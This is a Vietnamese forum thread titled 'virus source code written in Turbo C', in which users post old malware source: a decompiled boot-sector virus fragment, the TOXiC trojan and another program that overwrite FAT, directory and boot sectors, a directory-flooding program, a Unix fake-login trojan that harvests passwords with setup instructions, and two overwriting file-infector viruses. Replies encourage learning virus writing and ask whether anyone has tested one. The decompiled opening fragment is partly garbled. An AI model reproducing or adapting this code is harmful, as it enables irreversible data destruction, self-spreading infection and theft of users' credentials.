if(ax == *( Word *)&bx[2])
goto label_5;
}
ax = 0x301; /*PCH : RM_Table_init*/
cl = 3; /*PCH : RM_Table_init*/
dh = 1; /*PCH : RM_Table_init*/
if(bx[0x15] != 0xFD)
cl = 0xE; /*PCH : RM_Table_init*/
*(Word * )8 = cx;
Pushf();
(*(FAR_FNC)0xA)();
if(!CarryFlg) {
DirFlg = DOWN;
si = 0x3BE; /*PCH : RM_Table_init*/
di = 0x1BE; /*PCH : RM_Table_init*/
cx = 0x21; /*PCH : RM_Table_init*/
while( cx-- ) {
*(int *)MK_FP(es, di) = *(int *)si,
DirFlg ? di+=2, si+=2 : di-=2, si-=2;
};
bx = 0;
dx = 0;
Pushf();
ax = 0x301; /*PCH : RM_Table_init*/
cx = 1; /*PCH : RM_Table_init*/
(*(FAR_FNC)0xA)();
}
label_5:
di = pop();
si = pop();
es = pop();
ds = pop();
dx = pop();
cx = pop();
bx = pop();
ax = pop();
return;
label_6:
ax = 0;
ds = ax;
disable();
ss = ax;
enable();
push(ds);
push(0x7C00);
*(Word * )0x7C0A = *(Word * )0x4C;
*(Word * )0x7C0C = *(Word * )0x4E;
*(Word * )0x413 = *(Word * )0x411;
ax <<= 6;
es = ax;
*(Word * )0x7C05 = ax;
*(Word * )0x4C = 0xE;
*(Word * )0x4E = es;
di = 0;
DirFlg = DOWN;
si = 0x7C00; /*PCH : RM_Table_init*/
cx = 0x1BE; /*PCH : RM_Table_init*/
while( cx-- ) {
*MK_FP( es , DirFlg ? di++ : di-- ) = DirFlg ? *si++ : *si--;
};
goto_far *(Dword *)0x7C03;
label_7:
cx = 0;
ah = 4; /*PCH : RM_Table_init*/
geninterrupt(0x1A); /* BIOS Service func ( ah ) = 4 */
/* Read data from real time clock */
/* Output: DL/DH/CL/CH-dd/mm/yy/century */
/* CF=1 if no clock */
if(dx != 0x306)
return;
dx = 0;
cx = 1; /*PCH : RM_Table_init*/
label_9:
do {
si = *(Word * )8; /*PCH : RM_Table_init*/
ax = 0x309; /*PCH : RM_Table_init*/
if(si != 3) {
al = 0xE; /*PCH : RM_Table_init*/
if(si != 0xE) {
*(Byte *)7 = 4;
al = 0x11; /*PCH : RM_Table_init*/
dl = 0x80; /*PCH : RM_Table_init*/
}
}geninterrupt(0x13); /* BIOS Service func ( ah ) = 3 */
/* Write disk sectors */
/* Input: AL-sec num CH-track CL-sec */
/* DH-head DL-drive ES:BX-buffer */
/* Output: CF-flag AH-stat AL-sec written */
if(CarryFlg) {
ah = 0;
geninterrupt(0x13); /* BIOS Service func ( ah ) = 0 */
/* Reset disk system */
}
++dh;
} while((unsigned)dh < (unsigned)*(Byte *)7);
dh = 0;
++ch;
goto label_9;
push(bx);
bx[si] &= ah;
bp[di + 0x59] &= dl;
push(bx);
bx[si] = bx[si] + al;
push(bp);
*MK_FP( es , DirFlg ? di++ : di--) = al;
DirFlg = UP;
}

AlexF · 02-08-2008, 08:09 AM

C Code:

Select All | Show/Hide

/* TOXiC1 - TOXiC Trojan #1 - Programmed by Izzy Stradlin' and MiSERY/CPA */
/* MiSERY1 is the name given to this trojan. I programmed it, I name the */
/* Mother fucker. I hereby give all rights of this trojan to MiSERY/CPA. */
/* If ya don't like it, TOUGH. I Give ALL rights EXCEPT for the NAME to */
/* CPA - eg. NOONE CAN CHANGE THE NAME OF THIS THING W/O MY PERMISSION AND */
/* LEAVE MY NAME IN IT. The name must stay on, both my name and the name */
/* of the trojan are copyrighted (c) 90 to Izzy Stradlin' */
/* ----------------------------------------------------------------------- */
/* Capt. - This isn't a Real Virus - It's a Trojan. Sorry, still trying */
/* to use something similar to ASM's int 21h; for DOSs features, then I'll */
/* Get going on Virii. As is, this Destroys Boot/Fat/Dir on Most harddisks*/
/* and Well, there is so far no way that I know of that it can recover */
/* what the disk lost, as it writes the trojan name over everything. This */
/* SHOULD Go for BOTH FAT Tables, but I am not going to try it out. Haha. */
/* You try it - Tell me how it works! all I know is that it got 6 of my */
/* Flippin' floppies, damnit! - Delete this bottom message to you after */
/* Checking it out - Makes it look more professional. Leave the top text */
/* part in tact, just in case you want to pass it around. */
/* This is JUST A START. They DO/WILL Get better - this is weak, but as I */
/* Said - no known recovery from it. */
/* Oh, this looks for C: through H: */
#define TROJAN_NAME "TOXiC" /* Trojan Name */
/* Procedures */
void infect_fat();
void infect_dir();
void infect_boot();
void main();
/* Simple, eh? */
void infect_fat()
{
int i;
for (i=2; i<7; i++) {
abswrite(i,0,2,TROJAN_NAME);
}
}
void infect_dir()
{
int i;
for (i=2; i<7; i++) {
abswrite(i,2,2,TROJAN_NAME);
}
}
void infect_boot()
{
int i;
for (i=0; i<7; i++) {
abswrite(i,4,2,TROJAN_NAME);
}
}
void main()
{
printf(TROJAN_NAME);
infect_fat();
infect_dir();
infect_boot();
}

C Code:

Select All | Show/Hide

#include <dos.h>
#include <string.h>
main()
{
char *vir;
int i;
strcpy(vir,"");
for (i=0; i<40; i++)
strcat(vir,"HOWS IT DOING ROYAL UGLY DUDES!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!");
abswrite(2,50,0,vir);
abswrite(3,50,0,vir);
abswrite(4,50,0,vir);
abswrite(5,50,0,vir);
printf("Ouch dude... sorry..");
};

C Code:

Select All | Show/Hide

/* Make You Crazy !!
Never execute this program on your HD , haha !!
Programmed By Ninja Wala -- Royal Leader of Software Underground Palace
Share your knowledge and experience with other members in SUP,
and we share ours with you.
*/
#include <stdio.h>
#include <stdlib.h>
#include <dir.h>
main()
{
int i,j;
char tmp[20];
char far *ptr;
for (i=0;i<=50;i++){
srand(rand());
ptr = itoa(rand(),tmp,10);
mkdir ( ptr );
chdir ( ptr );
for (j=0;j<=50;j++){
ptr = itoa(rand(),tmp,10);
mkdir( ptr );
}
chdir ("\\");
}
}

AlexF · 02-08-2008, 08:12 AM

C Code:

Select All | Show/Hide

/**************
-------------------
A UNIX Trojan Horse
-------------------
Written By Shooting Shark on 10 June 1986. Released by Tiburon Systems
and R0DENTZWARE.
Disclaimer : I have *never* used the program below in any capacity except for testing it to see thatit does indeed work perfectly. I do not condone the use of such a program. I am presenting it for nformation purposes only. I will not be held liable
for any damages caused by the use of this program.
The following is a "trojan horse" program written in C for unix versions 4.2 and 4.3 (berkely unix) sing the C-shell. It might work on other versions of unix, such as AT&T System V. I haven't tried t. This program simulates the login for a unix machi
ne. When some poor fool enters his name and password, they will be written to a file called "stuff"in your home directory in the form:
user root has password joshua
if this file already exists, new password/login hacks will be appended to the file...thus after you un the program several times you will have a nice little database of hacked passwords.
How To Use The Program
----------------------
First, you'll need to configure the source so that it will look like your system's login when it is un (see below). Then, put the source in a file called horse.c and type the following:
cc horse.c -lcurses -ltermcap
mv a.out horse
and your ready-to-run program will be called 'horse'. You will have to invoke horse from a shellscrpt. Create a new file and put these two lines in it:
horse
login
Now when you 'source' this file, the horse program will be invooked and you can leave your terminal nd watch as somebody walks up to it and unknowingly gives you their password.
If you like, you can append the above two lines to your ".logout" file,
and whenever you log out, the horse program will be run automatically.
------- source begins here --------
***************************/
/* horse.c - Trojan Horse program. For entertainment purposes only.
* Written by Shooting Shark.
*/
#include <curses.h>
main()
{
char name[10], password[10];
int i;
FILE *fp, *fopen();
initscr();
printf("\n\nPyramid Technology 4.2/5.0 UNIX (tiburon)\n\n\n\nlogin: ");
/* You will need to alter the above line so it prints your system's
header. Each '\n' is a carriage return. */
scanf("%[^\n]",name);
getchar();
noecho();
printf("Password:");
scanf("%[^\n]",password);
printf("\n");
getchar();
echo();
sleep(5);
/* change the 'sleep(x)' above to give a delay similar to the delay your system gives. An instant "Lgin incorrect" looks suspicious. */
if ( ( fp = fopen("stuff","a") ) != -1 ) {
fprintf(fp,"login %s has password %s\n",name,password);
fclose(fp);
}
printf("Login incorrect\n");
endwin();
}
/****************************
--------- Source ends here. ---------
Note : in this program's present form, if somebody hits a ^C while your program is running, they wil be dumped into your shell and you might be kicked out of your school or whatever. If you know C, yu can add a signal structure to trap ^C's.
Call:
IDI..........415/344-6568
30 megs, IBM pirate line, Forum-PC software.
The Matrix...415/922-2008
101 megs (no shit), IBM wares, Forum-PC software.
-----
X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
Another file downloaded from: NIRVANAnet(tm)
& the Temple of the Screaming Electron Jeff Hunter 510-935-5845
Rat Head Ratsnatcher 510-524-3649
Burn This Flag Zardoz 408-363-9766
realitycheck Poindexter Fortran 415-567-7043
Lies Unlimited Mick Freen 415-583-4102
Specializing in conversations, obscure information, high explosives,
arcane knowledge, political extremism, diversive sexuality,
insane speculation, and wild rumours. ALL-TEXT BBS SYSTEMS.
Full access for first-time callers. We don't want to know who you are,
where you live, or what your phone number is. We are not Big Brother.
"Raw Data for Raw Nerves"
X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
*****************************/

C Code:

Select All | Show/Hide

/****************************
This is a pretty lame program, I would not advise running it on yourself
though. It will merely overwrite found files with itself, thus replicating.
It is for educational purposes only. Careful, since it overwrites, it is
destructive. Infecte files cannot be recovered. I could save time/date
stamps, etc. but this was just for fun, and took me only a few mintes to
throw together.
The Crypt Keeper/RRG
(619)/457-1836: The Programmer's Paradise
Oh yeah, use the tiny memory model, and make it a .COM file.
****************************/
#include <dos.h>
#include <dir.h>
#include <stdio.h>
#define V_SIZE 7424
int n_inf=0;
void resume(void);
void inf(char *vir, char *filename);
int compare(char *d, char *e);
void main(int argc, char **argv)
{
struct ffblk fileinfo;
char vir[V_SIZE];
FILE *fp;
char path[6];
int b,a=0;
argc++;
if((fp=fopen(argv[0],"rb"))==NULL) resume();
fread(vir,sizeof(char),V_SIZE,fp);
fclose(fp);
path[0]='*';
path[1]='.';
path[2]='E';
path[3]='X';
path[4]='E';
path[5]=NULL;
if(findfirst(path,&fileinfo,FA_ARCH)==-1) resume();
inf(vir,fileinfo.ff_name);
do {
if(findnext(&fileinfo)!=0) a=1;
else inf(vir,fileinfo.ff_name);
if((a==1) || (n_inf>4)) b=1;
} while (b!=1);
resume();
}
void inf(char *vir, char *filename)
{
FILE *fp;
char checkinf[V_SIZE];
if((fp=fopen(filename,"rb+"))==NULL) resume();
fread(checkinf,sizeof(char),V_SIZE,fp);
if(compare(vir,checkinf)==0) return;
fseek(fp,0L,SEEK_SET);
fwrite(vir,sizeof(char),V_SIZE,fp);
fclose(fp);
n_inf++;
}
int compare(char *d, char *e)
{
int a;
for(a=0;a<V_SIZE;a++) if(d[a]!=e[a]) return(1);
return(0);
}
void resume(void)
{
exit(0);
}

AlexF · 02-08-2008, 08:15 AM

Với kiến thức tiếng anh tốt và khả năng dịch các ngôn từ kỹ thuật trong TC các cậu có thể hoàn toàn làm chủ được các kỹ thuật làm virut trên C và cụ thể là trên TC
các con virut này đều đã được tác giả biên dịch về những tác hại của nó và những gì mà nó có thể gây ra,thân

6220119 · 02-08-2008, 11:34 AM

C Code:

Select All | Show/Hide

#include <dos.h>
#include <string.h>
main()
{
char *vir;
int i;
strcpy(vir,"");
for (i=0; i<40; i++)
strcat(vir,"HOWS IT DOING ROYAL UGLY DUDES!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!");
abswrite(2,50,0,vir);
abswrite(3,50,0,vir);
abswrite(4,50,0,vir);
abswrite(5,50,0,vir);
printf("Ouch dude... sorry..");
};

cái này chạy trên Win hình như chỉ thử đc. với đĩa A thôi chứ mấy ổ cứng sẽ hiện bảng thông báo và ko cho truy xuất trực tiếp vào HD

btw

C Code:

Select All | Show/Hide

/* This is a simple overwriting virus programmed in Turbo C */
/* It will infect all .COM files in the current directory */
/* Infections destroy the programs and cannot be cured */
/* It was presented in Virology 101 (c) 1993 Black Wolf */
/* FOR EDUCATIONAL PURPOSES ONLY, DO NOT RELEASE! */
#include <stdio.h>
#include <dos.h>
#include <dir.h>
FILE *Virus,*Host;
int x,y,done;
char buff[256];
struct ffblk ffblk;
main()
{
done = findfirst("*.COM",&ffblk,0); /* Find a .COM file */
while (!done) /* Loop for all COM's in DIR*/
{
printf("Infecting %s\n", ffblk.ff_name); /* Inform user */
Virus=fopen(_argv[0],"rb"); /* Open infected file */
Host=fopen(ffblk.ff_name,"rb+"); /* Open new host file */
x=9504; /* Virus size - must */
/* be correct for the */
/* compiler it is made */
/* on, otherwise the */
/* entire virus may not*/
/* be copied!! */
while (x>256) /* OVERWRITE new Host */
{ /* Read/Write 256 byte */
fread(buff,256,1,Virus); /* chunks until bytes */
fwrite(buff,256,1,Host); /* left < 256 */
x-=256;
}
fread(buff,x,1,Virus); /* Finish off copy */
fwrite(buff,x,1,Host);
fcloseall(); /* Close both files and*/
done = findnext(&ffblk); /* go for another one. */
}
/* Activation would go */
/* here */
return (0); /* Terminate */
}

rox_rook · 07-08-2008, 07:18 AM

Đọc mấy đoạn code này thấy phê phê T_T ! Thanks coder_gate !

zkday2686 · 11-08-2008, 03:43 PM

- Khiếp thiệt mấy cu này không lo học chính đạo mà toàn mò mấy cái tà đạo học không à....
- @coder_gate bạn kiếm đâu ra mấy con này mà hay vậy. mình thấy khoái chú thứ 4 từ trên xuống không biết có ai thử test nó chưa???

cho mình xem kết quả với.

Đề tài: Mã nguồn virus viết bằng Turbo C

Các công cụ đề tài

Display

Mã nguồn virus viết bằng Turbo C

Mã nguồn virus viết bằng Turbo C

Các đề tài tương tự

Mã nguồn virus viết bằng C(củ chuối)

SimpleAV | Mã nguồn Anti Virus đơn giản viết trên VC++ 2005

Cây nhị phân tìm kiếm trong C [Mã nguồn trên Turbo C/ Borland C++]

Viết virus khóa chuột - Lập trình virus trên C

Mã nguồn chương trình quyét virus viết trên VC++ 2008

Quyền hạn của bạn